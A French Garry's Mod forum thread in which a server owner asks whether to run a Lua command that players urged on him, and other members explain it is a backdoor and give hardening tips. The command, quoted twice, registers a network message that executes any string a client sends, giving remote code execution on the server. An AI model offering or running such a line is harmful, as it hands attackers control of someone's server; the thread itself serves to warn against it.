commande bizzare

• Initiateur de la discussion axel parpaillon
  • Date de début
  • Initiateur de la discussion
A

axel parpaillon

Têtard
Score réaction
0
bonjour, un "hacker" est passer sur mon serveur et a activer le strip weapon et des joueur mon dit de rentrer cette commande
ulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)

doit je le faire?
et comment desactiver le strip weapon

merci et bonne soirée

Ben. ®

Ben. ®

Psychopathe
Score réaction
511
axel parpaillon à dit:
bonjour, un "hacker" est passer sur mon serveur et a activer le strip weapon et des joueur mon dit de rentrer cette commande
ulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)

doit je le faire?
et comment desactiver le strip weapon

merci et bonne soirée
Ne la rentre pas. Tu l’as rentre t’as plus de serveur.

• J'aime
Réactions: xtramicka
Jean-Louii-Carrot

Jean-Louii-Carrot

Geek suprême
Score réaction
50
Tu peut désactiver le strip wepon avec FPP (Falco Prop Protection) et cette commande est une backdoor, en règle générale tout les commande commençant par "ulx rcon/luarun/groupallow" son dangereuse

• J'aime
Réactions: Yoh Sambre ♪ et axel parpaillon
Akulla

Akulla

Helpeur Divin
Score réaction
2 240
C'est qui les joueurs qui te demandent sa ?

• J'aime
Réactions: EnzoLeFrgl et axel parpaillon
Zlaydis

Zlaydis

Geek suprême
Score réaction
86
Mdr, t'as bien fait de poster ici, t'aurais écouter ses imbéciles t'aurait pu dire au revoir à ton futur projet..

• J'aime
Réactions: Yoh Sambre ♪ et axel parpaillon
A

axel parpaillon

Têtard
Score réaction
0
en gros un mec en ce moment s'amuse a hacker les nouveau serveur comme le mien avec sont mode menu donc il a un groupe steam , donc une vague de personne est venu sur mon serveur et un joueur m'a interpeler en me disant q'il y avais des screamer et qu'ils tournaient en rond ect, j'ai trouvé le coupable et je l'ai ban. mais par la suite il m'a dis qu' il y avais un strip weapon donc il m'a dit de mettre cette commande pour desactiver le strip et que si je le faisais pas bah le "hacker" pourrais détruire mon serveur ect... du coup la je suis un peu perdu car il m'a certifier que la commande du hacker apparemment est rester dans mon lua

Zlaydis

Zlaydis

Geek suprême
Score réaction
86
Les "hackers" vraiment des fifous en ce moment, c cho.

A

axel parpaillon

Têtard
Score réaction
0
Zlaydis à dit:
Les "hackers" vraiment des fifous en ce moment, c cho.
du coup comment savoir si il a reussis a "hacker" mon serveur ?

Akulla

Akulla

Helpeur Divin
Score réaction
2 240
Stop dire hack

Tu mets une rollback si ta rentre sa commande et tu mets l'option fpp @Yoh Sambre ♪

• J'aime
Réactions: EnzoLeFrgl
A

axel parpaillon

Têtard
Score réaction
0
Jean-Louii-Carrot à dit:
Tu peut désactiver le strip wepon avec FPP (Falco Prop Protection) et cette commande est une backdoor, en règle générale tout les commande commençant par "ulx rcon/luarun/groupallow" son dangereuse
je trouve pas ou le desactiver dans le fpp

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
Hello , pour patch le strip weapons qui il faut le savoir aurais normalement du étre patch 2/3 fois suite au dernière maj.. il suffit de suivre le screen suivant comme l'a indiquer @Jean-Louii-Carrot (de base cocher , il faut donc décocher 'People can use tool on world entities')

Pour la suite , contactez moi en MP ou sur steam afin que je m'occupe de vous apprendre l'intégralité des manœuvre de sécurité a mettre en œuvre sur un serveur Garry's Mod (ne vous inquiétez pas je fournit un support pareil naturellement gratuitement afin que n'importe qui soit a l'abri définitivement)

en attendant j'invite a suivre la mise en place de ce mini guide simple

- Achat de CAC
- Installation dans la collection workshop de l'addon suivant > SNTE
- Ne pas installer de leak (ou au moins vérifier le code)
- Pas de lien mediafire d'un 'ami' ou mec lambda
- souvent faire des extraction de certains objet workshop récemment maj sans trop d'explication (ceci est très rapide grâce a ce site )

• J'aime
Réactions: Broduin
A

axel parpaillon

Têtard
Score réaction
0
Yoh Sambre ♪ à dit:
Hello , pour patch le strip weapons qui il faut le savoir aurais normalement du étre patch 2/3 fois suite au dernière maj.. il suffit de suivre le screen suivant comme l'a indiquer @Jean-Louii-Carrot (de base cocher , il faut donc décocher 'People can use tool on world entities')

Pour la suite , contactez moi en MP ou sur steam afin que je m'occupe de vous apprendre l'intégralité des manœuvre de sécurité a mettre en œuvre sur un serveur Garry's Mod (ne vous inquiétez pas je fournit un support pareil naturellement gratuitement afin que n'importe qui soit a l'abri définitivement)

en attendant j'invite a suivre la mise en place de ce mini guide simple

- Achat de CAC
- Installation dans la collection workshop de l'addon suivant > SNTE
- Ne pas installer de leak (ou au moins vérifier le code)
- Pas de lien mediafire d'un 'ami' ou mec lambda
- souvent faire des extraction de certains objet workshop récemment maj sans trop d'explication (ceci est très rapide grâce a ce site )

merci bcp je vous ajoute sur steam je suis preneur de votre aide merci beaucoup !

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
J'en profite pour informer les membres du forum ou juste les 'lecteur anonyme' de ne pas hésiter a dire a leur ami fondateur de venir poser des questions comme l'a fait @axel parpaillon , le moindre doute peux très bien donner suite a un topic de ce genre que vous soyez chez un autre hébergeur ou votre propre machine dédier (nous somme contre la xénophobie huho) ,

les tricheurs profitant de codes malicieux sont faible est très (mais genre vraiment) facile a mettre a terre en terme d'abus que ce soit mod menu ou "minge method" (engine crash , ect) ..

pour preuve l'addon theblacklist a ralentis considérablement les imbéciles et mis a mal certaine réputation et maintenant SNTE agit en complément avec certains anticheat.

Ces gens sont de soit disant "anti gosse / anti serveur leak" mais comprenez bien qu'il sont en grande partie responsable de ce que Garry's Mod montre au grand publique (fr ou anglais) sous une fausse bataille > la plupart d'entre eux s'amuse juste a détruire des serveurs pour en faire des moment 'fun' .

RazzMo

RazzMo

Geek suprême
Score réaction
192
Pour mettre les choses au clair se ne sont pas des hacker mais des gignoles qui ont payer un mode menu.

Discord d'entraide
Rejoignz-nous sur Discord